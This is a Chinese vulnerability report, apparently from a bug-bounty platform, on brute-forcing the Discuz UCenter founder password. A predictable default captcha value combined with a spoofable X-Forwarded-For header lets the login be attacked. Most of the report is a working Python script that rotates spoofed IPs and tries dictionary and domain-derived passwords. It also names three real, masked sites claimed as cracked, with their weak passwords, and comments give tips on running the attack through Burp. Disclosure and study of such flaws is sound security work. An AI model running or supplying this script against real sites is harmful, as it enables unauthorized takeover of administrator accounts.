Discuz 的UCenter创始人密码可被爆破（有案例）

**.**.**.**/discuz/uc_server/admin.php

含有一个验证码

验证码的地址为

http://localhost/discuz/uc_server/admin.php?m=seccode&seccodeauth=250dIGq%2FYDhocuXf3IrsBkvB2k23JXlXAbuWr3X1liUcX94&7500

但是

经过测试发现

登录uc_server的时候 如果ip第一次出现那么 seccode的默认值为cccc

而 ip地址 是通过X-Forwarded-For 获取的。

也就是我们修改xff的ip之后，再次打开上面那个验证码url，图片的值为cccc

所以可以写一个程序通过修改X-Forwarded-For的值爆破密码。

程序写好了 如下。(代码渣，见谅。)拿创始人密码做案例，管理员密码应该也可以。

<poc>

#coding:utf-8
 import httplib,re,random,urllib,time
 from sys import argv
 
 # 进行爆破 
 def getHtml(host,htmlhash,htmlpass,htmlseccode):
  ip=str(random.randint(1,100))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))
  postHead={"Host":host,"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0","X-Forwarded-For":ip,'Content-Type':'application/x-www-form-urlencoded','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Connection':'keep-alive'}
  postContent='sid=&formhash='+htmlhash+'&seccodehidden='+htmlseccode+'&iframe=0&isfounder=1&password='+htmlpass+'&seccode=cccc&submit=%E7%99%BB+%E5%BD%95'
  resultHtml=httplib.HTTPConnection(host, 80, False)
  resultHtml.request('POST','/uc_server/admin.php?m=user&a=login',body=postContent,headers = postHead )
  page=resultHtml.getresponse()
  pageConect=page.read()
  return pageConect
 
 #获取 formhash  和  seccodehidden
 def gethashs(host):
  url='http://'+host+'/uc_server/admin.php'
  pageContent=urllib.urlopen(url).read()
  r1=**.**.**.**pile('<input type="hidden" name="formhash" value="(/S+)" />')
  htmlhash=r1.findall(pageContent)[0]
  r2=**.**.**.**pile('<input type="hidden" name="seccodehidden" value="(/S+)" />')
  htmlseccode=r2.findall(pageContent)[0]
  return htmlhash+' '+htmlseccode
 
 #通过argv获取 host 字典 间隔时间 进行爆破
 if(len(argv)==1):
  print '---->python '+argv[0]+' host地址 字典文件 间隔时间'
  print '---->python '+argv[0]+' **.**.**.** pass.txt 0.2'
 else:
  host=argv[1]
  passfile=argv[2]
  sleeptime=argv[3]
  print '网站host为  '+host
 #取域名 然后添加一些密码 
  hostuser=host.split('.')
  hostuser=hostuser[len(hostuser)-2]
  hostpass=[hostuser+'123',hostuser+'888',hostuser+hostuser,hostuser+'..',hostuser+'.',hostuser+'admin888',hostuser+'admin123',hostuser+'admin',hostuser+'123456']
  print '密码字典为  '+passfile
  print '间隔时间为  '+sleeptime
  print '--->'
  x=gethashs(host).split(' ')
  f=open(passfile,'r')
  htmlpass=f.read().split('/r/n')
  htmlpass=hostpass+htmlpass
  f.close()
  for i in range(len(htmlpass)):
   time.sleep(float(sleeptime))
   print '正在尝试密码'+htmlpass[i]
   if(getHtml(host,x[0],htmlpass[i],x[1])==''):
    print '密码为 '+htmlpass[i]
    break

</poc>

python dz_blast.py **.**.**.** pass.txt 0

**.**.**.** 新建的一个虚拟机 里面搭建的dz

附上几个成功案例

手头没有这种字典，就随便添加了几个密码测试了下，都是很常见的弱口令

1.http://**.**.**/ admin123456_
 2.http://**.**.**/  admin_
 3.http://**.**.**/  123456
 

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-10-21 09:43

厂商回复：

谢谢您发现问题。我们尽快予以处理

最新状态：

暂无

1. 2014-10-21 10:02 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安，不只保险这么简单。)

   0

   这个貌似要火，前排占位。

   1# 回复此人

2. 2014-10-21 10:38 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名，可我没猜出密码。)

   0

   设计缺陷/逻辑错误,api?

   2# 回复此人

3. 2014-10-21 15:02 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)

   0

   @Discuz! 你四个月前的漏洞还没处理，你能抓点紧吗？

   3# 回复此人

4. 2014-10-21 15:10 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

   0

   @Hmily 大哥 你急啥啊 另外pm俺 有事找你哈

   4# 回复此人

5. 2014-10-21 20:04 | 默秒全 ( 路人 | Rank:2 漏洞数:3 | a....)

   0

   前排围观

   5# 回复此人

6. 2014-10-23 14:14 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

   0

   @Hmily @xsser 哈哈、吾爱破解的逆向牛来挖洞了

   6# 回复此人

7. 2014-10-25 02:53 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

   0

   这个貌似要火，前排占位。

   7# 回复此人

8. 2014-12-04 21:13 | xcrypt ( 实习白帽子 | Rank:89 漏洞数:10 | 暂无介绍~)

   1

   burp可以暴破时不断改变x-forwarded-for，不需要单独写程序了。

   8# 回复此人

9. 2014-12-05 10:27 | hkAssassin ( 普通白帽子 | Rank:395 漏洞数:73 | 我是一只毛毛虫。)

   1

   @xcrypt 怎么操作给个教程

   9# 回复此人

10. 2014-12-05 20:38 | xcrypt ( 实习白帽子 | Rank:89 漏洞数:10 | 暂无介绍~)

    1

    @hkAssassin 可以把IP地址的后两位当做数字，比如1.1到255.255，然后step是0.1，这样每次提交都自动加0.1，每次就都不一样了。

    10# 回复此人

11. 2014-12-26 17:52 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)

    3

    官方今天发布补丁，解决方案是打了补丁就算你有密码也进不去UC后台！Discuz就是这么任性！

    11# 回复此人

12. 2014-12-26 23:00 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

    1

    这个比较屌！

    12# 回复此人

13. 2015-01-19 10:14 | Wangl ( 实习白帽子 | Rank:33 漏洞数:4 | 新浪支付，值得拥有)

    1

    屌爆了。

    13# 回复此人

14. 2015-01-19 11:02 | 夏殇 ( 实习白帽子 | Rank:44 漏洞数:26 | 不忘初心，方得始终。)

    1

    这么屌？

    14# 回复此人

15. 2015-01-19 11:28 | 菜菜 ( 实习白帽子 | Rank:83 漏洞数:7 | cnidc.hk:500:D5B9985DFBA5FE8A050A39C249C...)

    1

    火前留名

    15# 回复此人

16. 2015-01-21 16:22 | hack2012 ( 实习白帽子 | Rank:31 漏洞数:3 | 关注信息安全 http://www.waitalone.cn/)

    0

    本地测试了一下没有成功，请问哥们你测试的是哪个版本？

    16# 回复此人

17. 2015-05-05 06:55 | Skull ( 实习白帽子 | Rank:95 漏洞数:33 | 菜鸟一枚。)

    0

    这个爆破得不行啊＝ ＝

    17# 回复此人